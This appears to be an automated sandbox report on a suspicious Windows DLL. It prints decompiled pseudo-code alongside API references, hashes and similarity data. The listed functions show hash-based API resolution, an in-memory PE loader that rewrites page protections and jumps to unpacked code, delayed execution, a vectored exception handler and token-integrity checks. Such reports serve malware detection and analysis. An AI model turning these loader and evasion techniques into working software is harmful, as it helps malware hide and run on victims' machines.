				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xf06b4c6b;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v148, E6FC4F568(_t357) + 0x10);
				E6FC4F558( &_v152, E6FC4F568( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xa54975b2;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v156, E6FC4F568(_t361) + 0x10);
				E6FC4F558( &_v160, E6FC4F568( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x563e1998;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v164, E6FC4F568(_t365) + 0x10);
				E6FC4F558( &_v168, E6FC4F568( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0xd926c223;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v172, E6FC4F568(_t369) + 0x10);
				E6FC4F558( &_v176, E6FC4F568( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x80febacc;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v180, E6FC4F568(_t373) + 0x10);
				E6FC4F558( &_v184, E6FC4F568( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x98595b64;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v188, E6FC4F568(_t377) + 0x10);
				E6FC4F558( &_v192, E6FC4F568( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x8e3b5f9c;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v196, E6FC4F568(_t381) + 0x10);
				E6FC4F558( &_v200, E6FC4F568( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x9b42cb07;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v204, E6FC4F568(_t385) + 0x10);
				E6FC4F558( &_v208, E6FC4F568( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6FC5413C(0xa5eabdf8, _t434);
				E6FC4F558( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6FC4F558( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6FC4F558( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6FC4F558( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6FC4F558( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6FC4F558( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6FC4F558( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6FC4F558( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6FC4F558( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6FC4F558( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6FC4F558( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6FC4F558( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6FC4F558( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6FC4F558( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6FC4F558( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6FC4F558( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6FC4F558( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6FC41D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6FC4B338( &_v248, _v256, _t481, _v252, _t318);
				E6FC4F8DC( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xfb42c037;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v296, E6FC4F568(_t410) + 0x10);
				E6FC4F558( &_v300, E6FC4F568( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x7082aaf3;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v304, E6FC4F568(_t414) + 0x10);
				E6FC4F558( &_v308, E6FC4F568( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x1eeb5e35;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v312, E6FC4F568(_t418) + 0x10);
				E6FC4F558( &_v316, E6FC4F568( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xe856fc47;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v320, E6FC4F568(_t422) + 0x10);
				E6FC4F558( &_v324, E6FC4F568( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6FC4BAB8(_t154,  *_t480);
				E6FC4F558( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0"); // executed
				E6FC4F558( &_v344, 0x10); // executed
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6FC4F558( &_v348, "true");
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6FC4F558( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6FC4F6F0( &_v316);
				return E6FC4F6F0( &_v356);
			}

0x6fc41494
0x6fc41498
0x6fc4149d
0x6fc414a3
0x6fc414ab
0x6fc414b0
0x6fc414bc
0x6fc414c0
0x6fc414d2
0x6fc414e8
0x6fc414f3
0x6fc414f4
0x6fc414f5
0x6fc414f6
0x6fc414f7
0x6fc414fa
0x6fc414fe
0x6fc41502
0x6fc41509
0x6fc4151b
0x6fc41531
0x6fc4153c
0x6fc4153d
0x6fc4153e
0x6fc4153f
0x6fc41540
0x6fc41543
0x6fc41547
0x6fc4154b
0x6fc41552
0x6fc41564
0x6fc4157a
0x6fc41585
0x6fc41586
0x6fc41587
0x6fc41588
0x6fc41589
0x6fc4158c
0x6fc41590
0x6fc41594
0x6fc4159b
0x6fc415ad
0x6fc415c3
0x6fc415ce
0x6fc415cf
0x6fc415d0
0x6fc415d1
0x6fc415d2
0x6fc415d5
0x6fc415d9
0x6fc415dd
0x6fc415e4
0x6fc415f6
0x6fc4160c
0x6fc41617
0x6fc41618
0x6fc41619
0x6fc4161a
0x6fc4161b
0x6fc4161e
0x6fc41622
0x6fc41626
0x6fc4162d
0x6fc4163f
0x6fc41655
0x6fc41660
0x6fc41661
0x6fc41662
0x6fc41663
0x6fc41664
0x6fc41667
0x6fc4166b
0x6fc4166f
0x6fc41676
0x6fc41688
0x6fc4169e
0x6fc416a9
0x6fc416aa
0x6fc416ab
0x6fc416ac
0x6fc416ad
0x6fc416b0
0x6fc416b4
0x6fc416b8
0x6fc416bf
0x6fc416d1
0x6fc416e7
0x6fc416f2
0x6fc416f3
0x6fc416f4
0x6fc416f5
0x6fc416f6
0x6fc416f9
0x6fc416fd
0x6fc41701
0x6fc41708
0x6fc4171a
0x6fc41730
0x6fc4173b
0x6fc4173c
0x6fc4173d
0x6fc4173e
0x6fc4173f
0x6fc41742
0x6fc41746
0x6fc4174a
0x6fc41751
0x6fc41763
0x6fc41779
0x6fc41784
0x6fc41785
0x6fc41786
0x6fc41787
0x6fc41788
0x6fc4178b
0x6fc4178f
0x6fc41793
0x6fc4179a
0x6fc417ac
0x6fc417c2
0x6fc417cd
0x6fc417ce
0x6fc417cf
0x6fc417d0
0x6fc417d1
0x6fc417d4
0x6fc417d8
0x6fc417dc
0x6fc417e3
0x6fc417f5
0x6fc4180b
0x6fc41816
0x6fc41817
0x6fc41818
0x6fc41819
0x6fc4181a
0x6fc4181d
0x6fc41821
0x6fc41825
0x6fc4182c
0x6fc4183e
0x6fc41854
0x6fc4185f
0x6fc41860
0x6fc41861
0x6fc41862
0x6fc41863
0x6fc41866
0x6fc4186a
0x6fc4186e
0x6fc41875
0x6fc41887
0x6fc4189d
0x6fc418a8
0x6fc418a9
0x6fc418aa
0x6fc418ab
0x6fc418ac
0x6fc418af
0x6fc418b3
0x6fc418b7
0x6fc418be
0x6fc418d0
0x6fc418e6
0x6fc418f1
0x6fc418f2
0x6fc418f3
0x6fc418f4
0x6fc418f5
0x6fc418f8
0x6fc418fc
0x6fc41900
0x6fc41907
0x6fc41919
0x6fc4192f
0x6fc4193a
0x6fc4193b
0x6fc4193c
0x6fc4193d
0x6fc4193e
0x6fc41941
0x6fc41945
0x6fc41949
0x6fc41950
0x6fc41962
0x6fc41978
0x6fc41983
0x6fc41984
0x6fc41985
0x6fc41986
0x6fc4198c
0x6fc4198f
0x6fc41991
0x6fc4199c
0x6fc419a3
0x6fc419ac
0x6fc419b4
0x6fc419bb
0x6fc419c4
0x6fc419cc
0x6fc419d3
0x6fc419dc
0x6fc419e4
0x6fc419eb
0x6fc419f4
0x6fc419fc
0x6fc41a03
0x6fc41a0c
0x6fc41a14
0x6fc41a1b
0x6fc41a24
0x6fc41a2c
0x6fc41a36
0x6fc41a3f
0x6fc41a47
0x6fc41a51
0x6fc41a5a
0x6fc41a62
0x6fc41a6c
0x6fc41a75
0x6fc41a7d
0x6fc41a87
0x6fc41a90
0x6fc41a98
0x6fc41aa2
0x6fc41aab
0x6fc41ab3
0x6fc41abd
0x6fc41ac6
0x6fc41ace
0x6fc41ad8
0x6fc41ae1
0x6fc41ae9
0x6fc41af3
0x6fc41afc
0x6fc41b04
0x6fc41b0e
0x6fc41b17
0x6fc41b1f
0x6fc41b26
0x6fc41b2f
0x6fc41b37
0x6fc41b3e
0x6fc41b43
0x6fc41b51
0x6fc41b55
0x6fc41b64
0x6fc41b6d
0x6fc41b72
0x6fc41b79
0x6fc41b7d
0x6fc41b81
0x6fc41b88
0x6fc41b9a
0x6fc41bb0
0x6fc41bbb
0x6fc41bbc
0x6fc41bbd
0x6fc41bbe
0x6fc41bbf
0x6fc41bc2
0x6fc41bc6
0x6fc41bca
0x6fc41bd1
0x6fc41be3
0x6fc41bf9
0x6fc41c04
0x6fc41c05
0x6fc41c06
0x6fc41c07
0x6fc41c08
0x6fc41c0b
0x6fc41c0f
0x6fc41c13
0x6fc41c1a
0x6fc41c2c
0x6fc41c42
0x6fc41c4d
0x6fc41c4e
0x6fc41c4f
0x6fc41c50
0x6fc41c51
0x6fc41c54
0x6fc41c58
0x6fc41c5c
0x6fc41c63
0x6fc41c75
0x6fc41c8b
0x6fc41c96
0x6fc41c97
0x6fc41c98
0x6fc41c99
0x6fc41c9a
0x6fc41c9d
0x6fc41ca0
0x6fc41ca1
0x6fc41ca2
0x6fc41ca9
0x6fc41cac
0x6fc41cb7
0x6fc41cbe
0x6fc41cc7
0x6fc41ccf
0x6fc41cd6
0x6fc41cdf
0x6fc41ce7
0x6fc41cee
0x6fc41cf7
0x6fc41cff
0x6fc41d04
0x6fc41d0d
0x6fc41d15
0x6fc41d2a

Strings

$#,, xrefs: 6FC41701

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $#,
API String ID: 0-2557146312
Opcode ID: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction ID: 9b6cbc5937a0eb16ce56026141177078a85e7c04fee321d3d489aa39d2f78c87
Opcode Fuzzy Hash: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction Fuzzy Hash: 47326FB28047459EC706DF20C85199FB7B0AFA2219F104B1DB4A92B1E1FF71EA8ED751

Uniqueness

Uniqueness Score: -1.00%

Function 6FC5218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6FC5218C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6FC53A34(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6FC52F94(0xa5eabdf8, 0xd48281c0, 0xa5eabdf8, 0xa5eabdf8);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6fc5218c
0x6fc52190
0x6fc521ac
0x6fc521af
0x6fc52192
0x6fc521a1
0x6fc521a4
0x6fc521a4
0x6fc521bf
0x6fc521c4
0x6fc521c8
0x6fc521d0
0x6fc521d0
0x6fc521d4

APIs

NtDelayExecution.NTDLL(00000000,00000000,A5EABDF8,A5EABDF8,FFFFFFFF,FFFFFFFF,6FC435C3,00000000,00000000,?), ref: 6FC521D0

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction ID: bd7ce9a1850922be7a2cbc759d0c5ed7658da0d3ea1306767827422061a62478
Opcode Fuzzy Hash: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction Fuzzy Hash: 42E09BB010E3116DFF4497794D11B6F7AD9DF80211F20861DB554D62C4FB30D830472A

Uniqueness

Uniqueness Score: -1.00%

Function 6FC52790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6FC52790(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6FC52F94(0xa5eabdf8, 0xc15ccc53, 0xa5eabdf8, 0xa5eabdf8) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6fc52797
0x6fc527a0
0x6fc527ae
0x6fc527d1
0x6fc527d1
0x6fc527b0
0x6fc527c7
0x6fc527cb
0x00000000
0x6fc527cd
0x6fc527cd
0x6fc527cd
0x6fc527cb
0x6fc527d6

APIs

NtAllocateVirtualMemory.NTDLL(A5EABDF8,?,00000000,22DC1034,00000004,00000004,A5EABDF8,A5EABDF8,?,?,6FC58852,00003000,00000004,000000FF,A5EABDF8,22DC1034), ref: 6FC527C7

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction ID: b8ea32b1f365d36cfd226d08ea7ae1b49d77d61973bc239bb0909556f08385db
Opcode Fuzzy Hash: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction Fuzzy Hash: 60E0657120D342AFEB09CA25CC24EBFB7EDEF89240F108C1DB4A4C6550E770D8609726

Uniqueness

Uniqueness Score: -1.00%

Function 6FC53060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6FC53060(intOrPtr* __ecx) {
				void* _t1;

				_push(E6FC533D8);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6fc53060
0x6fc53065
0x6fc53067
0x6fc53069

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6FC533D8,6FC53050,A5EABDF8,A5EABDF8,?,6FC42530,00000001), ref: 6FC53067

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 732df181adcf27f341a550e75a956d6ded63154b657eb52ee836232d4ab3f751
Instruction ID: c178a180678f1049bf60ada8e53c608c427cbb30b64a58e120d632cf2a9a8657
Opcode Fuzzy Hash: 732df181adcf27f341a550e75a956d6ded63154b657eb52ee836232d4ab3f751
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 033F2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E033F2213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x33f4418 = 1;
				asm("movaps xmm0, [0x33f3010]");
				asm("movups [0x33f4428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E033F2569();
				E033F1D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E033F2569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x33f4418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E033F2569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x033f221f
0x033f222d
0x033f2234
0x033f2237
0x033f2241
0x033f2248
0x033f2252
0x033f2258
0x033f2261
0x033f226a
0x033f226d
0x033f2273
0x033f2277
0x033f227f
0x033f2283
0x033f2286
0x033f2289
0x033f228c
0x033f228f
0x033f22a9
0x033f22af
0x033f22b2
0x033f22ba
0x033f22be
0x033f22c1
0x033f22c4
0x033f22c7
0x033f22ca
0x033f22e6
0x033f2303
0x033f2328
0x033f232a
0x033f2333
0x033f2336
0x033f2340
0x033f2343
0x033f2346
0x033f2349
0x033f234c
0x033f23a4
0x033f23a4
0x033f254a
0x033f2550
0x033f244d
0x033f2453
0x033f249f
0x033f249f
0x033f24bc
0x033f24e2
0x033f24f0
0x033f24f3
0x033f24f7
0x033f24fb
0x033f2502
0x033f2508
0x033f250a
0x033f251c
0x033f2524
0x033f252a
0x033f2530
0x033f2536
0x00000000
0x00000000
0x033f253c
0x033f249f
0x033f245b
0x033f2469
0x033f2471
0x033f2474
0x033f2476
0x033f247c
0x033f2488
0x033f248e
0x033f2491
0x033f2494
0x033f238a
0x033f238a
0x033f23d8
0x033f23de
0x033f23e4
0x033f23ea
0x033f23f0
0x033f23f5
0x033f23fb
0x033f23fe
0x033f2401
0x033f2409
0x033f2411
0x033f2414
0x033f2417
0x033f241d
0x033f2423
0x033f242e
0x033f2362
0x033f2368
0x033f2368
0x033f23c5

APIs

VirtualProtect.KERNELBASE ref: 033F228F
VirtualProtect.KERNELBASE ref: 033F2328

Strings

t, xrefs: 033F2409

Memory Dump Source

Source File: 00000002.00000002.1042515814.00000000033F0000.00000040.00000001.sdmp, Offset: 033F0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: da65a895d787565b4e2e2fcfc433bf251d48fc6f2b5e6e4022bcfa92d77d6452
Instruction ID: d20e86b1038e9be6e5b44f517cbf47595da029646cf58d54b1aa5fcf7e238e0f
Opcode Fuzzy Hash: da65a895d787565b4e2e2fcfc433bf251d48fc6f2b5e6e4022bcfa92d77d6452
Instruction Fuzzy Hash: F48188B8E04208CFCB04DF99C580A9EFBF1BF48310F65856AE958AB351D734A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6FC51140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6FC51140(void* __ecx, void* __edi, void* __esi) {
				long _v12;
				void* _v20;
				void* _v24;
				char _v32;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v64;
				int _t31;
				void* _t33;
				long* _t39;
				intOrPtr* _t46;
				void* _t54;
				void* _t56;
				void* _t58;
				long* _t59;

				_t59 = _t58 - 0x20;
				_t56 = __ecx;
				_v12 = 0;
				_t46 = E6FC52F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t46 != 0) {
					 *_t46(_t56, 8,  &_v12);
				}
				_t39 = _t59;
				 *_t39 = _v12;
				_t39[1] = 1;
				if(E6FC4C33C(_t39) != 0) {
					L6:
					if(_t59[1] != 0) {
						E6FC4BC00(_t59);
					}
					return 0;
				} else {
					_t59[6] = 0;
					if(E6FC52F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t59[6])); // executed
					}
					_t24 = _t59[6];
					if(_t59[6] != 0) {
						E6FC4F620( &_v32, _t24);
						_t54 = E6FC4F558( &(_t59[3]), 0);
						if(E6FC52F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
							L14:
							E6FC4F6F0( &_v32);
							goto L6;
						} else {
							_t31 = GetTokenInformation(_v40, 0x19, _t54, _t59[7],  &(_t59[6])); // executed
							if(_t31 == 0) {
								goto L14;
							} else {
								_t33 = E6FC52F94(0xd0443458, 0x57bf3274, 0xd0443458, 0xd0443458);
								if(_t33 == 0) {
									goto L14;
								} else {
									_push( *_t54);
									asm("int3");
									return _t33;
								}
							}
						}
					} else {
						goto L6;
					}
				}
			}

0x6fc51142
0x6fc5114f
0x6fc51151
0x6fc51160
0x6fc51164
0x6fc5116e
0x6fc5116e
0x6fc51174
0x6fc51177
